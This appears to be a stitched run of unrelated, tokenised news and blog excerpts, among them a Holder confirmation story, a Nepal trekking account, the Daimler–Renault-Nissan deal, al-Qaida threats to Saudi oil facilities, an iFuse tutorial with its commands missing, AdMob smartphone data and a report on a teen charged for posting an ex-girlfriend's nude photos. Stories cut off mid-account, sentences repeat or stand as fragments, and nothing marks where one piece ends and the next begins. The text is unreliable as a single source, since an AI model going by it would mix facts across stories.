WASHINGTON — During his confirmation last year , Attorney General Eric H. Holder Jr. failed to notify the Senate that he had signed several briefs urging courts to reject President George W. Bush ’s claim that he had the power to imprison an American citizen as an “ enemy combatant , ” the Justice Department acknowledged Thursday .
“ The briefs should have been disclosed as part of the confirmation process , ” said Matthew Miller , a Justice Department spokesman .
“ In preparing thousands of pages for submission , it was unfortunately and inadvertently missed .
In any event , the attorney general has publicly discussed his positions on detention policy on many occasions , including at his confirmation hearing . ”
But at a meeting of the Senate Judiciary Committee , which held the confirmation hearing , Republicans signaled that they were likely to attack Mr. Holder over his joining the briefs — and his failure to list them , along with other public documents , on a routine confirmation questionnaire — when he testifies before them later this month .
“ Are we expected to believe that then - nominee Holder , with only a handful of Supreme Court briefs to his name , forgot about his role in one of this country ’s most publicized terrorism cases ? ” asked Senator Jon Kyl , Republican of Arizona .
Thorong
La is the highest altitude reached by many trekkers in their lifetimes , a few hundred feet higher than Everest Base Camp and eclipsed on the popular - treks list only by Kilimanjaro ’s 19,331 feet .
October , after the usual monsoon months , is prime trekking season because it is typically the driest month .
For pretty much every trekker in Nepal , whether headed to Annapurna , Everest or any of the other fabulously scenic regions , the preparation starts in the Thamel neighborhood of Katmandu , where every third storefront overflows with knockoff trekking poles , nylon pants and packs at prices half to a third of those elsewhere .
( Our guide , a 30 - something , thin - mustached Gurkha , called it “ Chinese North Face . ” )
Thamel has no sidewalks , so our every foray into its streets was a tooth - and - nail battle with rickshaws , cars and mopeds .
Then the bus ride from Katmandu : careering along cliffside roads , passing slower vehicles whenever a mouse hole of an opening presented itself , accompanied by a constant soundtrack of honking horns .
Essentially , by the time we arrived in the town of Bhulbhule at the start of the trek , the idea of walking around a mountain range seemed downright tame .
The first day started out misty and wet , and although I was excited when after 13 miles our guide announced that the night ’s teahouse was around the corner , I was anticipating a bowl of rice and lentils for dinner and a dung - burning hovel in which to sleep .
A couple of decades ago , when enterprising Nepalese villagers had only recently begun offering tea and space on the floor to passing hikers  giving rise to the term “ teahouse trekking ”  I might have been right .
But since 1993 , over 60,000 people on average have visited the Annapurna region every year , drastically altering the hospitality landscape .
OUR stop that night , the Waterfall View Guesthouse , was a two - story pink and aquamarine motel - like structure and restaurant overlooking a lofty cataract .
The double rooms had foam mattresses , pillows and electricity , and the four - page restaurant menu included fresh - baked bread and imported beer .
For hikers accustomed to dehydrated meals and wet tents , it was almost too much .
I stuffed myself with vegetable lo mein and an Indian potato curry , washed down with Nepali masala milk tea .
The next day the trail began to climb , and we passed pairs of middle - aged trekkers , dropping them one by one with our younger legs .
Soon huge masses of schist , granite and sandstone rose on either side of us , daubed with green moss and brown lichen and dripping with cascades of black fungus that grow in the runoff of the monsoon rains .
It was as if Jackson Pollock had been given an entire mountainside as his canvas .
That night , it began to rain in earnest .
A drenched , forgettable next day took us to Chame , the largest town this side of the pass .
We were happy to hang our clothes and dry our boots by the Shangri - La Guesthouse ’s stove , which the proprietor finally lighted after much prompting .
It poured all that night , too , and with the other guests , we stayed on the following day , passing the time and hoping the driving downpour would stop .
It is precisely to avoid rains like this , supposedly rare in the fall , that nearly three times as many people walk the trail in October as in the summer monsoon season .
We had caught the anomaly .
Voila , another one of these woodcut attempts !
This one makes me want to buy a bathtub and cram it into my apartment somewhere – probably the living room .
Either there or on my balcony .
Daimler 's Mercedes - Benz brand will benefit from shared technology German carmaker Daimler is to give Renault and Nissan a 3.1 % stake in its business as part of a global tie - up of the brands , it has been announced .
In exchange , Daimler will take a 3.1 % stakes in both Renault and Nissan , who have been in an alliance since 1999 .
The deal will see the companies remain separate , but allow them to share technology and development costs .
The carmakers will co-operate to make electric cars and light commercial vehicles , Nissan said .
Commenting on the deal , Daimler 's chairman Dr Dieter Zetsche said it was " a promising foundation " that would allow the companies to share resources .
" Our skills complement each other very well , " he said .
" We know that we can make brand - typical products based on shared architectures .
The individual brand identities will remain unaffected . "
The name of the game is to be present everywhere
Carlos Ghosn , Chairman and chief executive of the Renault - Nissan Alliance
The companies will co-operate on the development of the Smart car brand - made by Daimler - and a new Renault Twingo , including electric versions , the companies said .
Engines currently made by Renault - Nissan will also be modified to fit a new range of compact Mercedes Benz cars .
The companies said that the cars would be based on " jointly - developed architecture " , but would still differ from each other in terms of product design .
Benefits of scale Carlos Ghosn , chairman and chief executive of the Renault - Nissan Alliance , said the new tie - up would be able to benefit from Renault and Nissan 's positive experience .
Carlos
Ghosn says alliances are the future for the car industry " The Renault - Nissan Alliance knows how to work successfully in collaborative partnerships , " he said .
Speaking to reporters , Mr Ghosn said the modern car market demanded that manufacturers enter into these types of agreements .
" This industry is moving more and more towards increasing scale , and sharing innovation and investment , " he said .
" The name of the game is to be present everywhere .
You have to be present in all of the emerging markets , and in every segment in those markets . "
" No small or medium car manufacturer can afford that . "
Renault and Nissan formed their alliance in 1999 based on cross -shareholding similar to the new deal with Daimler .
The alliance was credited with helping Nissan , in particular , turn its finances around .
FROM BBC WORLD SERVICE Please turn on JavaScript .
Media requires JavaScript to play .
More from BBC World Service Based on 2009 sales figures , Renault - Nissan is the fourth - biggest car maker in the world , with annual sales of 6.1 million vehicles .
Mr Ghosn added that he expected the alliance to expand even more in the future , and that the companies would continue to talk to other carmakers about possible tie-ups .
The bosses of the two groups also said they expected to see savings of about 2bn euros ( £ 1.76bn , $ 2.68 bn ) as a result of the alliance over the first five years .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
For now , electricity generation from the sun ’s rays needs to be subsidized because it requires the purchase of new equipment and investment in evolving technologies .
But costs are rapidly dropping .
And regulators are still learning how to structure stimulus payments so that they yield a stable green industry that supports itself , rather than just costly energy and an economic flash in the pan like Spain’s .
Image Puertollano , a mining center , has wooed the solar industry .
Credit ...
The New York Times
“ The industry as a whole learned a lot from what happened in Spain , ” said Cassidy DeLine , who analyzes the European solar market for Emerging Energy Research , a firm based in Cambridge , Mass .
She noted that other countries had since set subsidies lower and issued stricter standards for solar plants .
Yet , despite the pain that Spain ’s incentives ended up causing , in many ways they fulfilled their promise , Ms. DeLine said .
“ Even though incentives can create bubbles and bursts , without them this industry wo n’t take off , ” she said .
“ The U.S. is really behind Europe on this , and if we wait until solar is cost - competitive on its own , we may miss the boat and an opportunity to shape the market . ”
The most robust Spanish solar companies survived the downturn , have restructured and are re-emerging as global players .
For example , when the government changed course , Siliken Renewable Energy , originally a producer of solar panels , shut its factories for five months and cut its staff to 600 from 1,200 .
But after shifting its focus to external markets like Italy , France and the United States , and diversifying into solar support services , the company now turns a profit .
“ We were a company that banks trusted , so we could make the shift , ” said Antonio Navarro , a company spokesman .
“ But a lot of little companies disappeared . ”
THE FACTS
Looking to lose a little weight ?
Portion size and exercise are crucial .
But do n’t forget about a good night ’s rest .
Scientists have known for years that skimping on sleep is associated with weight gain .
A good example was a study published in 2005 , which looked at 8,000 adults over several years as part of the National Health and Nutrition Examination Survey .
Sleeping fewer than seven hours a night corresponded with a greater risk of weight gain and obesity , and the risk increased for every hour of lost sleep .
Image Credit ... Christoph Neimann
More recent studies have taken a much closer look .
One published this year in The American Journal of Clinical Nutrition took a small group of men and measured their food intake across two 48 - hour periods , one in which they slept eight hours and another in which they slept only four .
After the night of abbreviated sleep , the men consumed more than 500 extra calories ( roughly 22 percent more ) than they did after eight hours of sleep .
A University of Chicago study last year had similar findings in both men and women : subjects took in significantly more calories from snacks and carbohydrates after five and a half hours of sleep than after eight and a half hours .
The Cassini spacecraft has captured lightning flashing in a cloud on Saturn ’s dark side in a first - of - its - kind video .
Scientists have picked up radio signals for years that indicated that lightning storms happened on the planet , but this is the first time that they were able to see and “ hear ” the electrical storms at the same time .
“ This is the first time we have the visible lightning flash together with the radio data , ” said Georg Fischer , a radio and plasma wave scientist based at the Space Research Institute in Graz , Austria , in a press release .
“ Now that the radio and visible light data line up , we know for sure we are seeing powerful lightning storms . ”
The video was shot over 16 minutes and compressed down into the 10 seconds that you see here .
The cloud , which is about 1,900 miles along its longest side , is illuminated by the reflection of Saturn ’s rings .
Each flash is about 190 miles ( 300 kilometers ) across with an energy comparable to the most intense lightning here on Earth .
In real time , they lasted for about one second .
The crackling soundtrack to the video is synthetic .
It approximates the actual sounds received by Cassini ’s radio recording instrument , which are above the human hearing range .
Images : NASA / JPL / SSI / University of Iowa
WiSci 2.0 : Alexis Madrigal ’s Twitter , Tumblr , and green tech history research site ; Wired Science on Twitter and Facebook .
Posted on Mon , 2010-03-22 18:58
Of all the ridiculous ideas that precipitated what people are apparently calling The Great Recession , junk mortgages -- " subprime " is somehow too kind a word , here -- have to rank among the worst .
Real estate in general , and New York apartments and condominiums in particular , have long ranked among the smartest and safest investments out there , but the rise and sad popularity of junk mortgages such as " interest - only " mortgages during the real estate boom did much to unmake that .
Sure , the right NYC condo is still a terrific investment , but the market in general was damaged seriously by all the homes and apartments ( generally not in New York City , of course ) that were sold to people via frankly crappy means such as interest - only mortgages .
So it is with great pleasure that we read this New York Times article about the decline of the interest - only mortgage .
That sound you hear is the New Construction Manhattan blog applauding .
The good news is that if you 've found New Construction Manhattan , you 're probably not going to be suckered into a junk mortgage on your NYC condo or apartment .
This is not just because you 're smart -- although of course you are , and also you look great today and should always wear your hair like that -- but because working with people you can trust is the easiest way to avoid a mortgage that winds up turning your Manhattan condominium into a royal albatross around your neck .
The fun part of finding a condominium in Manhattan is , obviously , perusing Manhattan condo listings and visiting said Manhattan condos , but the New Construction Manhattan Buyer 's Guide is a must - read before you embark on this process .
With New Construction Manhattan 's network of trustworthy real estate agents ( and approved mortgage brokers ) , you 'll get the best possible price on your NYC apartment , but you 'll also get pointed in the right direction , financing - wise .
Which , if you have n't guessed , is away from such huckster -y poison as interest - only mortgages .
NYC Daily Real Estate Blog
Trends Expert Gerald Celente is also known as Dr Doom and the Nostradamus of Modern Times , Gerald Celente is regarded as one of the foremost trend predictors in the world .
This author of Trends 2000 and Trend Tracking , and publisher of The Trends Journal , is frequently a guest on television news and talk show programs .
The New York Post said " if Nostradamus were alive today , he'd have a hard time keeping up with Gerald Celente . "
RIYADH , Saudi Arabia , March 25 ( UPI ) --
The roundup of more than 100 al - Qaida suspects allegedly planning attacks on Saudi Arabia 's oil installations heightened concerns that battering the global energy industry remains a high strategic priority for the jihadists .
Wednesday 's announcement of the counter - insurgency operation carried out in the kingdom , the world 's leading oil producer , over recent months came hard on the heels of a U.S. Navy warning Monday that al - Qaida was planning possible suicide attacks on ships off Yemen in the Red Sea , the Bab al - Mandeb Strait and the Gulf of Aden .
Advertisement
In earlier indications of a new jihadist offensive against the energy sector , Singapore 's navy warned March 3 that terrorists planned to attack oil tankers in the choke point Strait of Malacca between Malaysia and the Indonesian island of Sumatra .
The 600 - mile waterway , the shortest route between the Persian Gulf and the Pacific , is a vital energy corridor to Asia , particularly energy - hungry China .
In early February , Said al - Shihri , deputy leader of al - Qaida in the Arabian Peninsula , the jihadist group based in Yemen , called on jihadists in Somalia , across the Gulf of Aden , to join his fighters and take control of the Bab al - Mandeb Strait .
That waterway , north of the pirate - infested Gulf of Aden , links the Red Sea and the Indian Ocean .
The Saudi announcement that 113 suspected jihadists , all but three of them Saudis or Yemenis , were arrested in several security sweeps over five months underlined that AQAP is determined to relaunch major operations against the Saudi monarchy after the jihadist campaign in the kingdom was crushed in 2006 .
The Saudis said at least two suicide teams of six men each had been formed in Yemen , which has become a major al - Qaida base since the Saudi and Yemeni jihadists joined forces in late 2008 .
Riyadh did n't identify the installations it said the jihadists were targeting .
But they are likely to include major terminals and refineries in the kingdom 's Gulf - side Eastern province , the center of its oil industry , and on the Red Sea coast .
The Gulf coast sites include the vast Ras Tanura complex .
This includes the world 's largest oil terminal , which transfers 5 million barrels per day , around 6 percent of all the oil consumed daily around the globe .
One U.S. energy expert said Ras Tanura " is the single most important facility in the oil industry . "
It was believed to have been the target of a 10 - man al - Qaida cell that included men who worked for the state oil company , Aramco , which was broken up in Saudi security in October 2003 .
Also on the Gulf coast is Abqaiq , the largest oil processing facility and the largest crude stabilization plant in the world .
It handles around two - thirds of Saudi Arabia 's crude output .
Al - Qaida made an abortive attack on the facility on Feb. 24 , 2004 .
On May 1 that year , gunmen attacked the kingdom's western oil hub at Yanbu on the Red Sea , killing six Western expatriates at a complex jointly run by the Saudi petrochemical firm Sabic and Exxon Mobil .
Yanbu is a key export terminal for Saudi crude bound for North America and Europe .
Four weeks later , on May 29 , jihadists stormed a complex in Khobar , near the oil center of Dhahran on the Gulf coast .
Twenty - two people , including 19 expatriates , were killed .
The objective in these two attacks was to drive away foreign personnel who help operate the Saudi oil and gas industry .
There are an estimated 25,000 foreigners , mainly Americans , Canadians and Europeans , working in the oil industry .
Many are in top management or highly specialized technical sectors .
Their exodus would seriously damage the Saudi petroleum industry and slow the U.S. economy .
After these attacks , al - Qaida 's campaign petered out but the strategy was never abandoned .
In December 2004 , Osama bin Laden called for further attacks on oil facilities as part of an economic jihad against the United States .
In an audio tape he noted that the 1979 - 89 conflict in Afghanistan " bled Russia for 10 years until it went bankrupt and was forced to withdraw .
" We are continuing the same policy to make the U.S. bleed profusely to the point of bankruptcy . "
He later declared that " the biggest reason for our enemies ' control over our lands is to steal our oil … Give everything you can to stop the greatest theft of oil in history . "
In Mac and Windows , you can easily sync your iPhone / iPod Touch with iTunes , but in Linux , there is no easy way to sync your iDevice ’s music library with any of the media player .
Even if you are willing to jailbreak your phone , there are still plenty of complicated steps that you need to do to get the syncing to work .
With the release of iFuse ( and a bunch of other library ) , things have changed .
Not only can you mount your iPhone as an external drive in Ubuntu , you can also use it to sync your music library with Rhythmbox .
The following tutorial only works in Ubuntu Karmic ( and other karmic - derivative distro ) and iPhone firmware 3.0 and above .
Remove all iFuse related files
If you have previously installed ifuse in your system , you need to remove it and its related files .
If you did not install ifuse before , you can ignore this part and skip to the next section .
You also need to remove the jonabeck repository from your apt list .
Delete the jonabeck PPA from the sources .
list file .
Save and close .
Refresh your system .
Installing iFuse ( for Ubuntu Karmic only )
Add the iFuse PPA to your repository :
Update your system
If there is a need , restart your computer .
Install the relevant packages
Update : I have removed libiphone0 libiphone - dev from the above packages since they are not longer needed .
When the installation is done , go to System -> Users and Groups
Click on the key icon to unlock .
Click the Manage Groups button .
Scroll down till you see the fuse entry .
Select it and click the Properties button .
Check the box beside your username and click OK .
Close all windows and restart your computer .
You can now plug in your iPhone / iPod Touch and see it appears in your Rhythmbox and Nautilus .
That ’s it .
Let us know in the comments if this works for you .
Image credit : pennacook
Utah is on the verge of criminalizing miscarriages while it looks like Iowa has already criminalized accidents and doubts :
That 's when things got really bad and really crazy .
Alone , distraught , and frightened , Taylor confided in the nurse treating her that she had n't always been sure she 'd wanted this baby , now that she was single and unemployed .
She 'd considered both adoption and abortion before ultimately deciding to keep the child .
The nurse then summoned a doctor , who questioned her further about her thoughts on ending the pregnancy .
Next thing Taylor knew , she was being arrested for attempted feticide .
Apparently the nurse and doctor thought that Taylor threw herself down the stairs on purpose .
According to Iowa state law , attempted feticide is an trying " to intentionally terminate a human pregnancy , with the knowledge and voluntary consent of the pregnant person , after the end of the second trimester of the pregnancy . "
At least 37 states have similar laws .
Taylor spent two days in jail before being released .
That 's right , a pregnant woman was jailed for admitting to thinking about an abortion at some point early in her pregnancy and then having the audacity to fall down some stairs a couple of months later .
Please tell me you find this as horrifying as I do .
Google 's Android platform is gaining ground on its rivals in the U.S. , such as Apple 's iPhone and RIM's BlackBerry .
But Android did just NOT pass the iPhone in Web traffic in the U.S. last month , despite a story on TechCrunch with that assertion as the headline .
Based on recent comScore data , we estimate that iPhone - based web traffic is still at least 2X Android web traffic in the U.S .
So why did TechCrunch get it wrong ?
The TechCrunch post is based on the latest monthly ad statistics from AdMob , a mobile ad network that 's being acquired by Google .
Specifically , one graph in AdMob 's report showed that in March , Android 's percentage of ad requests in AdMob 's network surpassed the iPhone for the first time .
( In the AdMob chart , Android ad requests are presented in red , and iPhone in dark blue . )
TechCrunch takes this to mean that Android Web traffic exceeded iPhone Web traffic .
" AdMob measures mobile ad impressions , which is a proxy for overall traffic , " TechCrunch 's Leena Rao explains .
That 's simply not accurate .
While Android 's user base -- and Web traffic consumption -- is growing and could eventually rival Apple's , AdMob 's ad request data is NOT a proxy for mobile web usage in general .
Why not ?
Because AdMob 's statistics include an important variable that can cause significant fluctuations : AdMob 's publisher relationships with web sites and apps , which cause different types of ad requests over time as the publisher network changes .
For example , if AdMob were to add more Android apps -- and therefore , more Android ad requests -- to its publisher base , or if it were to lose iPhone apps from its publisher base , that would affect its ad request statistics .
In other words , Android and iPhone ad request stats could shift significantly from quarter to quarter with nothing else changing but AdMob 's publisher relationships .
And to some extent , that 's what 's happening .
After speaking with AdMob , we understand that AdMob is seizing a big percentage of the new Android - app ad market .
At the same time , it is likely losing share of the iPhone ad market , which is becoming much more competitive as other ad networks like Millennial , JumpTap , and Google catch up to AdMob 's early lead .
Even Apple is about to jump in the scene .
So while AdMob still has a strong position in the iPhone ad market , it 's probably not RELATIVELY as dominant as it is in the Android ad market .
Therefore , AdMob is probably capturing a much higher share of Android ad requests than iPhone ad requests , which is skewing the stats in Android 's favor .
Putting it all together ...
i Phone users still outnumber Android users in the U.S. by at least 2 to 1 , based on recent comScore data .
i Phone and Android owners use their phones basically the same way , AdMob tells us .
Therefore , overall iPhone ad requests should still significantly outnumber Android ad requests .
Yet according to AdMob data , Android requests outnumber iPhone requests .
This suggests that any discrepancy in AdMob 's ad requests is a function of AdMob 's ad network more than any other factor .
And therefore , it is not valid to say that Android passed iPhone in web usage using only AdMob 's ad statistics as evidence .
Now , for something more entertaining : The Crazy Phones In Japan That The iPhone And Android Are Competing With
Investing Money in the Stock Market – What You Need to Know
The stock market can be tricky .
It is very easy to lose a great deal of your money in the stocks if you are not careful .
And yet , we see examples of successful investors everyday who have consistently done well investing money in the markets .
What is it they know that you may not ?
We asked a few selected personal finance bloggers to help us solve the puzzle of investing money with success .
It turns out that while investing is not a very complicated process , you need to have the discipline and understanding of some basic principles if you want to be successful over time .
Let ’s find out what these basics are in their own words .
Starting with the Basics
When should you consider starting taxable investing ?
Many of us have retirement plans at work and maybe an IRA or a Roth IRA on our own .
Yet , we know that these retirement plans are likely not going to be enough when it comes to saving for retirement and all the other life goals we have .
Which means , we also need to have taxable investments .
PT
Money digs deep and explains when it makes sense to start up taxable investing .
Many of us have retirement plans at work and maybe an IRA or a Roth IRA on our own .
Yet , we know that these retirement plans are likely not going to be enough when it comes to saving for retirement and all the other life goals we have .
Which means , we also need to have taxable investments .
digs deep and explains when it makes sense to start up taxable investing .
Once you have decided to open up an investment account , it is now time to figure out which broker to go with .
There are countless choices in the market .
Moolanomy makes this selection process easier for us in How to Choose the Best Stock Broker ?
stating “ There is no such thing as the “ best discount broker ” .
The best really depends on who you are and your investment style .
Here are seven criteria to help you determine which stock broker might be the best for you . ”
Simple enough , but what should I invest in ?
Specially when you are starting out , the key ideas that you need to focus are diversification and costs .
Diversification reduces the volatility of your portfolio ( or in other words , tendency to fluctuate in value ) .
Keeping costs down always makes sense .
Low Cost Index Funds are a MoneyNing favorite and I have to agree .
Instant diversification with low cost , what is not to like !
While they will not make you rich overnight , they are also less likely to suffer large and quick losses .
are a favorite and I have to agree .
Instant diversification with low cost , what is not to like !
While they will not make you rich overnight , they are also less likely to suffer large and quick losses .
One way to buy low cost index funds is using an ETF .
Exchange Traded Funds , are a great alternative to mutual funds , writes FreeFromBroke .
They also provide excellent liquidity and tax efficiency .
, are a great alternative to mutual funds , writes .
They also provide excellent liquidity and tax efficiency .
While most agree that diversification is key to reducing risk , MapleMoney reminds us that we need to consider our house and careers when choosing our portfolio diversification .
Very true .
It is important to have a complete money perspective in your financial life .
reminds us that we need to .
Very true .
It is important to have a complete money perspective in your financial life .
While we are discussing diversification and index funds , it is also important to note that you can get exposed to real estate using diversified index funds without the hassle of all the overhead and maintenance that comes with owning real estate .
This is an excellent advice from RealEstatePro .
Typically real estate market is not very highly correlated to the stock market ( with the recent crash being a notable exception ) , so adding these securities to your portfolio is an excellent hedge against market volatility .
Okay , is there anything I should watch out for ?
Plenty !
And you will get to know most of them soon enough .
Scams abound , as you can imagine in any industry that has to do with money .
Beware of the hot tips you get from your coworker or that pretty lady sitting next to you in the subway .
Some of the most nefarious ones , as Jeff Rose writing in Good Financial Cents points out , are the penny stock scams .
You may also want to structure your finances to be crash proof .
Got it .
I am now ready to move to the next level
Great .
As you found out , it is not all that difficult .
The next two articles describe 2 ways you can automate your investments in a way that maximizes your returns and reduces risk at the same time .
Dollar Cost Averaging is one of the very popular methods of automating your investments .
As the Consumer Boomer explains , the DCA strategy is designed to lower your cost per share while at the same time introduce the discipline you need to consistently invest .
is one of the very popular methods of automating your investments .
As the explains , the DCA strategy is designed to lower your cost per share while at the same time introduce the discipline you need to consistently invest .
We wrote ab0ut an alternative strategy to DCA called Value Averaging here at Financial Highway some time back .
This is little more tricky to set up but the benefits can exceed what you get from Dollar Cost Averaging .
Finally , if you wish to try your hand at picking individual stocks , you should look into the practice of investing called Value Investing .
Most successful investors including Benjamin Graham and Warren Buffett are disciples of Value Investing .
One particular aspect of value investing involves picking out great companies that are temporarily struggling , or fallen angels .
Miranda points us to a great interview and book review with Gabriel Wisdom at AllBusiness that touches on this fascinating topic
How to save the Earth via the World Wide Web
Solar Stormwatch hopes to harness the public to spot Coronal Mass Ejections
DIGITAL PLANET
BBC World Service
There are not many websites which literally give you the chance to protect the world .
Yet , if you are keen on spending a few moments of your day defending the Earth from an imminent solar attack , the Royal Observatory in Greenwich , London would like to hear from you .
Its Solar Stormwatch website highlights the danger of radiation bursts from the Sun - and gives users the chance to help scientists spot Sun storms - known as coronal mass ejections - before they cause damage on Earth .
The site was built in partnership with the Science and Technology Facilities Council 's Rutherford Appleton Laboratory and citizen science site Zooniverse .
" When you look up at the Sun obviously it 's too bright to look at properly , " said Dr Marek Kukula from the Royal Observatory .
Even if you log - on and just do it for a few hours , get bored and never touch it again it 's all really useful
Dr Marek Kukula
" With special instruments and telescopes you can see there 's all sorts of stuff going on .
" These coronal mass ejections are enormous explosions on the Sun which hurl billions of tonnes of material out into space .
" If that hits the Earth , that 's when these problems are caused . "
The bursts of radiation from the Sun can knock out telecoms systems , causing millions of pounds of damage and even endangering life .
Nasa already monitors the Sun using two spacecraft called ' Stereo ' .
The craft produce 3D images of the star which can show the trajectory of these explosions .
However , the sheer amount of data means Nasa 's scientists are unable to analyse the data as closely as they need - which is where the world 's internet population comes in .
DIGITAL PLANET Digital Planet is the weekly technology programme broadcast from the BBC World Service
It is broadcast on Tuesday at 1232GMT and repeated at 1632GMT , 2032GMT and on Wednesday at 0032GMT
It is also available as a podcast
It can be found on the social networks Facebook and Orkut After a brief - and painless , the makers assure - tutorial , users get access to the actual 3 - D images taken by the Stereo spacecraft .
Then , if a user believes they have spotted the beginnings of a solar storm , they can bring it to the attention of scientists .
" Every little bit counts , " said Dr Kukula .
" I 've spoken to the scientists involved and they all agree that even if you log - on and just do it for a few hours , get bored and never touch it again it 's all really useful - and helps them to do their work . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Aw .
But do n’t worry .
He ’ll be feeling much better when they inevitably return next week .
In 2004 , newly married and having decided to embark on the next phase of adulthood , my wife and I bought a house .
This was back in the delirious days of multiple offers and outlandish escalation clauses , when you had to bring your checkbook with you to an open house , just in case someone else tried to buy the place while you were poking around the attic .
I called a mortgage broker somewhere in Florida , and she was thrilled to hear from me , practically breathless .
I felt as if I were the 10,000th customer to come through line at the Safeway , my arrival heralded by streamers and sirens and all kinds of free stuff falling from the rafters .
Did we want a five - year adjustable - rate loan or maybe even rates adjusted on a monthly basis ?
Why not just pay just the interest rather than the principal ?
Did we also need a bridge loan for a few months , to hold us over from one house to the next ?
How about a ‘‘ second trust ' ' — that is , two mortgages instead of one — so we could put less money down , maybe even as little as 5 percent of the purchase price while avoiding the penalty of private mortgage insurance ?
We might as well open a home equity line of credit on top of the mortgage , she said , so we could borrow another six - figure sum with the tear of a perforated check .
Countrywide , the nation 's largest lender , would happily give us that free , and , hey , you never knew when you might decide to add a skylight over the kitchen , or maybe a stone turret .
I did n't spend five minutes thinking about the larger implications of any of this .
Like so many other relatively comfortable Americans who were just coming of ownership age , I had nothing against which to judge the situation ; this was the only kind of housing market my wife or I had ever known .
Nor did I feel compelled to ask any questions when Grace , the terrific nanny we hired to look after our newborn son , bought her own first home some time later .
A Filipino immigrant who was on the path to citizenship , Grace was visibly proud to be making the classic American investment in her future , just as we had .
Eventually my wife and I added a daughter to the mix , and soon the home we purchased just five years earlier felt stretched and insufficient .
‘‘ We do need a bigger house , '' Grace agreed , surveying the battlefield of fallen toys that had once been our living room , and this helped persuade my wife of the same thing .
And so we decided to plunge into the housing market once again .
I knew , of course , that the credit climate , even in Washington 's relatively stable housing market , had darkened considerably since our last purchase .
Still , my wife and I had no debt to speak of and nearly perfect credit scores , and so it was a jolt to find , when I began to call a series of mortgage bankers , that each sounded more dubious about my plans than the last .
This time around , I actually was interested in obtaining a bridge loan .
But bridge financing , one after another of the bankers dryly informed me , was no longer a realistic option for people like us .
Because my wife and I were looking at renovating an older house , we thought we might hold some cash back and secure a second trust instead .
‘‘ No one 's giving those out anymore , '' one banker told me .
‘‘ We just got killed on those . ''
I asked about a line of credit , so we could pay for renovations that way .
Forget about it , they told me somberly .
If I was n't going to put down more than 20 percent of the home value , no one was going to risk extending my credit .
I could handle the financial ramifications of hearing ‘‘ no ' ' from a bank , but nothing in my experience had prepared me for the succession of emotions that came with it .
I will admit to feeling inadequate , even a little embarrassed , in the moments after I put down the phone and pondered these conversations .
I imagined myself suddenly as the loan applicant in all those 20th - century movies , the ones where the guy sits in the well of some august , oak - paneled bank and pleads his desperate , not very persuasive case to a granite - faced banker on the other side of the desk .
My father had paid off a 30 - year mortgage in five years by foregoing carpets and new cars , and yet here I was : the prototypical American consumer of my generation , just another shaky borrower aspiring to live beyond his means .
I replayed in my head the exchange with one broker who reluctantly offered that he knew of a small bank in Pennsylvania that might just be persuaded to open the kind of credit line I was seeking — if he personally vouched for me .
I felt like an addict looking to score .
C'mon , you must know someone who 's willing to do this .
. . .
May 23 , 2008  -- Alex Phillips , a " wise guy " who wanted to get revenge on his 16 - year - old girlfriend by posting photos of her most private parts on MySpace , now faces felony child pornography charges in Wisconsin .
Phillips is 17 and considered an adult under the law , and his former girlfriend is a minor .
He told La Crosse County Sheriff 's Department he was just " venting " after she jilted him last week .
The girlfriend had taken the naked photos of herself in her home , then sent them to Phillips on her cell phone , according to Sgt. Mark Yehle .
One was " front body nudity " and a second was her " vaginal and anal area , " he said .
" I can only surmise she thought that would impress him somehow , " said Yehle .
" She 's not an innocent victim .
Kids do n't realize that once a photo is in a digital format and you send it to someone , you better trust that person . "
When the girl discovered the photos had been posted on the Internet with explicit captions , she contacted police , who asked Phillips to take them down or face jail time .
Police said the boy refused , saying , " F*** that , I am keeping them up . "
Phillips eventually told police he would take down the photos , but they were still there the next day , according to Yehle , so they contacted MySpace , which immediately had them removed .
Yehle said Phillips has been living with his grandparents , who are his guardians , and not attending school .
He also had been previously charged with drug violations .
Sentence Could Be 12 Years
Phillips , who is one year older than his ex-girlfriend , has been charged with possession of child pornography , sexual exploitation of a child by a person under 18 and defamation .
The exploitation charges alone carry a 12 - year sentence , according to circuit court papers .
The charges may seem harsh for two teens so close in age , but one Internet safety expert said they are a stern warning .
Phillips turns 18 in June , and could have been charged under federal law with even tougher penalties .
Attempts by ABC News to reach Phillips for comment were unsuccessful .
" Generally , law enforcement does n't want to do it unless it 's trafficking , " said Parry Aftab , an Internet privacy and security lawyer and volunteer for WiredSafety .
" The problem was he was a wise guy . "
" I am sure he will be pleaded out , " she said .
" No one wants him to go to jail .
It 's more than a slap on the wrist , but if you tell police where to go , you 'll end up in jail . "
Without stiff penalties in cases like these , teens like Phillips can take down the photos then repost them elsewhere .
" If you ca n't get a kid to stop , it 's like trying to catch a river in your hand , " Aftab said .
" They are letting him know how serious this is . "
Phillips ' attitude may have been cavalier , but using the Internet to play out his breakup is not .
Incidents like this have been common for years among teens , according to Aftab .
Several years ago in Bergen County , N.J. , one teen convinced others to have sex on camera and sold the pictures .
In Riverdale , N.Y. , a girl distributed a video of herself masturbating and having oral sex with a banana and posted it on Kazaa and " no one could get it down , " she said .
American Idol Scandal
American Idol contestant Antonella Barba was under fire when a series of racy photos were published on the Internet in 2007 .
She said they were personal photos that were " exploited without my consent , " according to news reports at the time .
" It 's truly an epidemic and no surprise , " said Aftab .
" Nothing is private anymore .
Everyone wants to be Pamela Anderson . "
With a cell phone or Web cam and Internet access , girls can distribute photos for all to see .
" It 's even good kids who you think never in a million years would they do it . "
" They are looking for their 15 megabytes of fame , " she said .
" They want to be admired , want someone to want them .
A lot of them are lonely and starved for attention .
A lot of girls think they have no choice but to pose in this way .
And then there are the thrill seekers who do it because it 's edgy and cool . "
Girls as young as 12 take photos of themselves " naked from the neck down , " according to Aftab .
" They come from good homes and their parents would be devastated if they knew . "
Such was the case with Deborah Kusich , who was mortified when she discovered sexual photos of her 13 - year - old stepdaughter on MySpace .
" She and her friend were humping the bed as if they were having sex , " said the San Carlos , Calif . , mother .
Other photos were equally suggestive .
Girls Are ' Naive '
When she confronted her , the teen " came completely unglued . …
I told her if I could get into her page , anyone could .
She was totally naïve about it . "
" I read all this stuff about kids who were putting their names and photos out there and were stalked by predators , " she said .
" I had the talk with her about how she was putting herself in the public domain . "
Police doubt Alex Phillips will face " grave consequences " for posting the photos of his girlfriend online , especially because " she created them , " said Yehle .
" This is becoming more common now , " he said .
" I can't say what he 'll get at his age and her age , but they 'll probably come up with a plea agreement . "
